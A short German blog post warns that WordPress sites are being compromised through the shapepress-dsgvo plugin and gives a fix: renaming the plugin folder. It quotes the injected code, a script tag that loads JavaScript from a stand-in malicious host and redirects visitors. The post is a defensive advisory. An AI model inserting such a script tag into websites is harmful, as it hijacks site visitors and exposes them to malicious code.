Seite wählen

Hacks über das Plugin shapepress-dsgvo

24.09.2021 | Security, Wordpress

Es gibt aktuell vermehrt Hinweise auf erfolgreich angegriffene WordPress-Seiten. Ursache hierbei ist das Plugin shapepress-dsgvo Es wird folgender Schadcode auf der Webseite hinterlegt, der für die Weiterleitung verantwortlich ist:

<!-- id='sp-dsgvo-script-container-matomo' class='sp-dsgvo-script-container'--><script type='text/javascript' src='https://boese-url.ga/jsa/trim.js'></script><!-- end sp-dsgvo-script-container-matomo -->

Es hilft den Plugin-Ordner shapepress-dsgvo umzubenennen. Ein Zugriff auf die Webseite und das Backend ist dann wieder möglich.

0 Kommentare